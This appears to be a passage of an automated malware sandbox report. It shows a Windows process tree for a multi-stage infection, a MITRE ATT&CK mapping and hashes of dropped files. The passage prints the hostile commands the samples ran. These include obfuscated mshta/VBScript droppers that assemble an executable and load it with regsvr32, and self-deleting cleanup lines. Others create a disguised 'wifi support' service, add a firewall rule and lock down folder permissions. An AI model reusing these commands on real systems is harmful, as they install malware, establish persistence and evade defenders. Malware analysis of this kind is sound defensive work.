                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4112
                                          • C:\Windows\system32\rUNdlL32.eXe
                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                            1⤵
                                            • Process spawned unexpected child process
                                            • Suspicious use of WriteProcessMemory
                                            PID:2832
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                              2⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:2496
                                          • C:\Windows\system32\rUNdlL32.eXe
                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                            1⤵
                                            • Process spawned unexpected child process
                                            PID:4868
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                              2⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              PID:5108
                                          • \??\c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                            1⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            PID:4544
                                          • C:\Users\Admin\AppData\Local\Temp\A74D.exe
                                            C:\Users\Admin\AppData\Local\Temp\A74D.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:3736
                                          • C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                            C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3668
                                            • C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                              C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:4500
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Users\Admin\AppData\Local\2d3d94c9-2c35-4a8e-8798-6bbd5608af7e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                3⤵
                                                • Modifies file permissions
                                                PID:1908
                                              • C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                                "C:\Users\Admin\AppData\Local\Temp\D9A8.exe" --Admin IsNotAutoStart IsNotTask
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:5100
                                                • C:\Users\Admin\AppData\Local\Temp\D9A8.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\D9A8.exe" --Admin IsNotAutoStart IsNotTask
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Modifies extensions of user files
                                                  PID:3896
                                                  • C:\Users\Admin\AppData\Local\2abd4935-61a5-4efd-9a1e-85fe51c14d97\build2.exe
                                                    "C:\Users\Admin\AppData\Local\2abd4935-61a5-4efd-9a1e-85fe51c14d97\build2.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:1984
                                                    • C:\Users\Admin\AppData\Local\2abd4935-61a5-4efd-9a1e-85fe51c14d97\build2.exe
                                                      "C:\Users\Admin\AppData\Local\2abd4935-61a5-4efd-9a1e-85fe51c14d97\build2.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks processor information in registry
                                                      PID:4940
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\2abd4935-61a5-4efd-9a1e-85fe51c14d97\build2.exe" & del C:\ProgramData\*.dll & exit
                                                        7⤵
                                                          PID:4580
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im build2.exe /f
                                                            8⤵
                                                            • Kills process with taskkill
                                                            PID:4720
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            8⤵
                                                            • Delays execution with timeout.exe
                                                            PID:1168
                                            • C:\Users\Admin\AppData\Local\Temp\E93A.exe
                                              C:\Users\Admin\AppData\Local\Temp\E93A.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              PID:652
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im E93A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E93A.exe" & del C:\ProgramData\*.dll & exit
                                                2⤵
                                                  PID:3684
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im E93A.exe /f
                                                    3⤵
                                                    • Kills process with taskkill
                                                    PID:2212
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    3⤵
                                                    • Delays execution with timeout.exe
                                                    PID:4440
                                              • C:\Users\Admin\AppData\Local\Temp\344E.exe
                                                C:\Users\Admin\AppData\Local\Temp\344E.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:3848
                                              • C:\Users\Admin\AppData\Local\Temp\3662.exe
                                                C:\Users\Admin\AppData\Local\Temp\3662.exe
                                                1⤵
                                                  PID:4832
                                                • C:\Users\Admin\AppData\Local\Temp\3E52.exe
                                                  C:\Users\Admin\AppData\Local\Temp\3E52.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:3204
                                                  • C:\Users\Admin\AppData\Local\Temp\3E52.exe
                                                    C:\Users\Admin\AppData\Local\Temp\3E52.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4172
                                                • C:\Users\Admin\AppData\Local\Temp\4B72.exe
                                                  C:\Users\Admin\AppData\Local\Temp\4B72.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetThreadContext
                                                  PID:2452
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4B72.exe"
                                                    2⤵
                                                      PID:3940
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        3⤵
                                                        • Delays execution with timeout.exe
                                                        PID:4852
                                                  • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                    C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4128
                                                    • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                      C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                      2⤵
                                                        PID:3332
                                                      • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                        C:\Users\Admin\AppData\Local\Temp\4DC5.exe
                                                        2⤵
                                                          PID:3848
                                                      • C:\Users\Admin\AppData\Local\Temp\5095.exe
                                                        C:\Users\Admin\AppData\Local\Temp\5095.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4404
                                                      • C:\Users\Admin\AppData\Local\Temp\545F.exe
                                                        C:\Users\Admin\AppData\Local\Temp\545F.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:4612
                                                      • C:\Users\Admin\AppData\Local\Temp\5932.exe
                                                        C:\Users\Admin\AppData\Local\Temp\5932.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:4744
                                                      • C:\Users\Admin\AppData\Local\Temp\6048.exe
                                                        C:\Users\Admin\AppData\Local\Temp\6048.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4832
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        C:\Windows\SysWOW64\explorer.exe
                                                        1⤵
                                                          PID:4220
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe
                                                          1⤵
                                                            PID:4304
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            C:\Windows\SysWOW64\explorer.exe
                                                            1⤵
                                                              PID:5076
                                                            • C:\Windows\explorer.exe
                                                              C:\Windows\explorer.exe
                                                              1⤵
                                                                PID:900
                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                C:\Windows\SysWOW64\explorer.exe
                                                                1⤵
                                                                  PID:4440
                                                                • C:\Windows\explorer.exe
                                                                  C:\Windows\explorer.exe
                                                                  1⤵
                                                                    PID:4784
                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                    1⤵
                                                                      PID:1872
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe
                                                                      1⤵
                                                                        PID:4944
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:4256
                                                                        • C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                          1⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4964
                                                                          • C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                            2⤵
                                                                              PID:3116
                                                                              • C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\B6B6.exe" --Admin IsNotAutoStart IsNotTask
                                                                                3⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:2676
                                                                                • C:\Users\Admin\AppData\Local\Temp\B6B6.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\B6B6.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  4⤵
                                                                                  • Modifies extensions of user files
                                                                                  PID:520
                                                                                  • C:\Users\Admin\AppData\Local\cf33074b-75b4-4a77-a568-23723a7a7939\build2.exe
                                                                                    "C:\Users\Admin\AppData\Local\cf33074b-75b4-4a77-a568-23723a7a7939\build2.exe"
                                                                                    5⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4040
                                                                                    • C:\Users\Admin\AppData\Local\cf33074b-75b4-4a77-a568-23723a7a7939\build2.exe
                                                                                      "C:\Users\Admin\AppData\Local\cf33074b-75b4-4a77-a568-23723a7a7939\build2.exe"
                                                                                      6⤵
                                                                                      • Loads dropped DLL
                                                                                      • Checks processor information in registry
                                                                                      PID:152
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\cf33074b-75b4-4a77-a568-23723a7a7939\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                        7⤵
                                                                                          PID:4684
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im build2.exe /f
                                                                                            8⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:4512
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 6
                                                                                            8⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:856
                                                                            • C:\Users\Admin\AppData\Local\Temp\B7DF.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\B7DF.exe
                                                                              1⤵
                                                                                PID:4064
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mtuqwypf\
                                                                                  2⤵
                                                                                    PID:4596
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ehmnawpr.exe" C:\Windows\SysWOW64\mtuqwypf\
                                                                                    2⤵
                                                                                      PID:4496
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      "C:\Windows\System32\sc.exe" create mtuqwypf binPath= "C:\Windows\SysWOW64\mtuqwypf\ehmnawpr.exe /d\"C:\Users\Admin\AppData\Local\Temp\B7DF.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                      2⤵
                                                                                        PID:2412
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        "C:\Windows\System32\sc.exe" description mtuqwypf "wifi internet conection"
                                                                                        2⤵
                                                                                          PID:2260
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          "C:\Windows\System32\sc.exe" start mtuqwypf
                                                                                          2⤵
                                                                                            PID:3632
                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                            2⤵
                                                                                              PID:3408
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:2644
                                                                                            • C:\Users\Admin\AppData\Local\Temp\BA51.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\BA51.exe
                                                                                              1⤵
                                                                                                PID:4276
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" VbsCRipT: CLoSE(CreATEobjeCt ( "WsCripT.SHELl" ). RUn ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\BA51.exe"" > ..\M5ENOa6tLELBL.eXE&& stArT ..\M5ENoA6tLELBL.eXe /Pt2KDn4uOOsx9FbW_UXw & If """"== """" for %f IN ( ""C:\Users\Admin\AppData\Local\Temp\BA51.exe"") do taskkill /F /IM ""%~Nxf"" " ,0,true ) )
                                                                                                  2⤵
                                                                                                    PID:4736
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\BA51.exe" > ..\M5ENOa6tLELBL.eXE&& stArT ..\M5ENoA6tLELBL.eXe /Pt2KDn4uOOsx9FbW_UXw&If ""== "" for %f IN ( "C:\Users\Admin\AppData\Local\Temp\BA51.exe") do taskkill /F /IM "%~Nxf"
                                                                                                      3⤵
                                                                                                        PID:2696
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\M5ENOa6tLELBL.eXE
                                                                                                          ..\M5ENoA6tLELBL.eXe /Pt2KDn4uOOsx9FbW_UXw
                                                                                                          4⤵
                                                                                                            PID:4764
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" VbsCRipT: CLoSE(CreATEobjeCt ( "WsCripT.SHELl" ). RUn ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\M5ENOa6tLELBL.eXE"" > ..\M5ENOa6tLELBL.eXE&& stArT ..\M5ENoA6tLELBL.eXe /Pt2KDn4uOOsx9FbW_UXw & If ""/Pt2KDn4uOOsx9FbW_UXw""== """" for %f IN ( ""C:\Users\Admin\AppData\Local\Temp\M5ENOa6tLELBL.eXE"") do taskkill /F /IM ""%~Nxf"" " ,0,true ) )
                                                                                                              5⤵
                                                                                                                PID:4388
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\M5ENOa6tLELBL.eXE" > ..\M5ENOa6tLELBL.eXE&& stArT ..\M5ENoA6tLELBL.eXe /Pt2KDn4uOOsx9FbW_UXw&If "/Pt2KDn4uOOsx9FbW_UXw"== "" for %f IN ( "C:\Users\Admin\AppData\Local\Temp\M5ENOa6tLELBL.eXE") do taskkill /F /IM "%~Nxf"
                                                                                                                  6⤵
                                                                                                                    PID:4448
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VBsCRipT:cLoSe (CReATEoBjECt ( "wscripT.SHeLL" ). RuN ( "CMd /q /c eCho JIGWq%RAnDom%pm> O1AZVVBs.O & EcHo | set /p = ""MZ"" > 5AHCc.GS &cOPY /y /b 5AHCC.gS + RUSbhk1Q.n+ PY816NxM.GY + JeUC.8jL + O1AZvVBS.o ..\s9df.OiL & stARt regsvr32.exe ..\s9DF.OiL -S& DEL /q * " , 0 , tRuE ) )
                                                                                                                  5⤵
                                                                                                                    PID:3332
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /q /c eCho JIGWq%RAnDom%pm> O1AZVVBs.O & EcHo | set /p = "MZ" > 5AHCc.GS &cOPY /y /b 5AHCC.gS + RUSbhk1Q.n+ PY816NxM.GY + JeUC.8jL+ O1AZvVBS.o ..\s9df.OiL & stARt regsvr32.exe ..\s9DF.OiL -S&DEL /q *
                                                                                                                      6⤵
                                                                                                                        PID:4524
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>5AHCc.GS"
                                                                                                                          7⤵
                                                                                                                            PID:4988
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                            7⤵
                                                                                                                              PID:5068
                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                              regsvr32.exe ..\s9DF.OiL -S
                                                                                                                              7⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                              PID:4712
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /F /IM "BA51.exe"
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:2644
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BC85.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BC85.exe
                                                                                                                  1⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:4796
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im BC85.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\BC85.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:3044
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im BC85.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4724
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:4800
                                                                                                                  • C:\Windows\SysWOW64\mtuqwypf\ehmnawpr.exe
                                                                                                                    C:\Windows\SysWOW64\mtuqwypf\ehmnawpr.exe /d"C:\Users\Admin\AppData\Local\Temp\B7DF.exe"
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:3748
                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                      svchost.exe
                                                                                                                      2⤵
                                                                                                                        PID:3624
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DB5D.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DB5D.exe
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:2076
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DB5D.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DB5D.exe
                                                                                                                        2⤵
                                                                                                                          PID:4380

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Persistence

                                                                                                                      Modify Existing Service

                                                                                                                      2
                                                                                                                      T1031

                                                                                                                      New Service

                                                                                                                      1
                                                                                                                      T1050

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      2
                                                                                                                      T1060

                                                                                                                      Privilege Escalation

                                                                                                                      New Service

                                                                                                                      1
                                                                                                                      T1050

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      4
                                                                                                                      T1112

                                                                                                                      Disabling Security Tools

                                                                                                                      2
                                                                                                                      T1089

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      File Permissions Modification

                                                                                                                      1
                                                                                                                      T1222

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      4
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Query Registry

                                                                                                                      6
                                                                                                                      T1012

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      System Information Discovery

                                                                                                                      6
                                                                                                                      T1082

                                                                                                                      Peripheral Device Discovery

                                                                                                                      1
                                                                                                                      T1120

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      4
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                        MD5

                                                                                                                        bdb9a4789b7f3f2f47beaeaa777e7f2f

                                                                                                                        SHA1

                                                                                                                        0a4f1359a9ed362f4e1acb7969524764be1db0d7

                                                                                                                        SHA256

                                                                                                                        89f65efc3afe76abd72ff30fdb7ac4ab2741004019dc58a7f216567335921921

                                                                                                                        SHA512

                                                                                                                        3c95eb7c815a14d839cd83f654251f08d2a07d7edd7c775dfd2cdd5e52656606df4d1dd348b9074b24bd26643a2c691f51cdd341e0c08d75600e7ba5eb642ffa

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                        MD5

                                                                                                                        37d3519ecb977bf2040e491eabf604b0

                                                                                                                        SHA1

                                                                                                                        c0fe0fbef7c3d676c389cb2aca83c35eb1c6e1a8

                                                                                                                        SHA256

                                                                                                                        d69a46082808baeb9b4890977ab62a1d41491ab528a0e6745c9122e57f25b586

                                                                                                                        SHA512

                                                                                                                        dd1f3419ca4a4c63dba98f41bbe2e36e707b34b4007cdb7de90f2ded968714570eae7e4c73ab6455c311c9df407c36857c920036f6575e6ae38a2c6c08b623b2

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        MD5

                                                                                                                        cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                        SHA1

                                                                                                                        b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                        SHA256

                                                                                                                        0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                        SHA512

                                                                                                                        4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        MD5

                                                                                                                        cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                        SHA1

                                                                                                                        b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                        SHA256

                                                                                                                        0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                        SHA512

                                                                                                                        4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        MD5

                                                                                                                        cccf90ef6caa1c720eb17ccba041b365

                                                                                                                        SHA1

                                                                                                                        55e66eca9cf8e2fb2e2b1cc80907d14e617a13f8

                                                                                                                        SHA256

                                                                                                                        252dd54cd72c470bd4dc0011f8937e5075b32ee666fd3a76e8e5cab97ff52855

                                                                                                                        SHA512

                                                                                                                        92114fa395e62d6aa675253c3373eadc1d21370e1af4d73fe2eee22c26bcf1c7641af860707162a975a71cbff14a285e7aa9b26260717d5a850f4cced8d39202

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        MD5

                                                                                                                        cccf90ef6caa1c720eb17ccba041b365

                                                                                                                        SHA1

                                                                                                                        55e66eca9cf8e2fb2e2b1cc80907d14e617a13f8

                                                                                                                        SHA256

                                                                                                                        252dd54cd72c470bd4dc0011f8937e5075b32ee666fd3a76e8e5cab97ff52855

                                                                                                                        SHA512

                                                                                                                        92114fa395e62d6aa675253c3373eadc1d21370e1af4d73fe2eee22c26bcf1c7641af860707162a975a71cbff14a285e7aa9b26260717d5a850f4cced8d39202

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\libcurl.dll
                                                                                                                        MD5

                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                        SHA1

                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                        SHA256

                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                        SHA512

                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\libcurlpp.dll
                                                                                                                        MD5

                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                        SHA1

                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                        SHA256

                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                        SHA512

                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\libgcc_s_dw2-1.dll
                                                                                                                        MD5

                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                        SHA1

                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                        SHA256

                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                        SHA512

                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\libstdc++-6.dll
                                                                                                                        MD5

                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                        SHA1

                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                        SHA256

                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                        SHA512

                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\libwinpthread-1.dll
                                                                                                                        MD5

                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                        SHA1

                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                        SHA256

                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                        SHA512

                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\setup_install.exe
                                                                                                                        MD5

                                                                                                                        aa775ed5f04a52df52e0ec398276a122

                                                                                                                        SHA1

                                                                                                                        99dcdcae4d2bec213f4122880dd17940a97e1f59

                                                                                                                        SHA256

                                                                                                                        a21481507b9ac77467fb98509b8e73fa9075be0d8d991fcedc3de92970974a10

                                                                                                                        SHA512

                                                                                                                        6ba38e8b12acb3adeec8112d7f9cde94349a728e6cf0f82f3a33351521eb8048e255993d5c5e639b787e394223d1fa65325030aa099228f3455d20f5eb01f880

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\setup_install.exe
                                                                                                                        MD5

                                                                                                                        aa775ed5f04a52df52e0ec398276a122

                                                                                                                        SHA1

                                                                                                                        99dcdcae4d2bec213f4122880dd17940a97e1f59

                                                                                                                        SHA256

                                                                                                                        a21481507b9ac77467fb98509b8e73fa9075be0d8d991fcedc3de92970974a10

                                                                                                                        SHA512

                                                                                                                        6ba38e8b12acb3adeec8112d7f9cde94349a728e6cf0f82f3a33351521eb8048e255993d5c5e639b787e394223d1fa65325030aa099228f3455d20f5eb01f880

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4BA3D404\sonia_1.exe
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

